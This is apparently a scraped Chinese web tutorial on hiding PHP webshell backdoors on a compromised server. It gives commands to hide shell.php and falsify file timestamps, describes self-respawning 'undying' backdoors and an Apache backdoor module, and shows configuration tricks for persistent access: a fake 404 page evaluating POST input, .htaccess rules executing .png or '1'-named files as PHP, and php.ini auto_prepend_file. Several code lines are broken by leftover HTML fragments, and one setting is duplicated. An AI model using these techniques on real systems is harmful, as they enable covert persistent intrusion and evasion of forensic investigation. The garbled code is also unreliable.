attrib +s +a +h +r shell.php //隐藏shell.php文件

//修改时间修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//访问时间修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//创建时间修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

echo ^<"htmlcode">

<"color: #ff0000">4、不死马

不死马会删除自身，以进程的形式循环创建隐蔽的后门。


<"color: #ff0000">5、中间件后门

将编译好的so文件复制到modules文件夹，启动后门模块，重启Apache。当发送特定参数的字符串过去时，即可触发后门。
github项目地址：

https://github.com/VladRico/apache2_BackdoorMod

6、利用404页面隐藏后门
404页面主要用来提升用户体验，可用来隐藏后门文件。


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<"/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
"color: #ff0000">7、利用 .htaccess 文件构成PHP后门

一般.htaccess可以用来留后门和针对黑名单绕过，在上传目录创建.htaccess 文件写入，无需重启即可生效，上传png文件解析。


AddType application/x-httpd-php .png



另外，在.htaccess 加入php解析规则，把文件名包含1的解析成php，上传1.txt即可解析。


<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>



8、利用 php.ini 隐藏后门文件
php.ini 中可以指定在主文件执行前后自动解析的文件名称，常用于页面公共头部和尾部，也可以用来隐藏php后门。

；在PHP文档之前自动添加文件。

auto_prepend_file = "c:\tmp.txt"

;在PHP文档之后自动添加文件。

auto_prepend_file = "c:\tmp.txt"

需重启服务生效，访问任意一个php文件即可获取webshell。
总结

                                
                                

                                    php后门隐藏,php如何防止后门,php查后门 
                                
华山资源网 Design By www.eoogi.com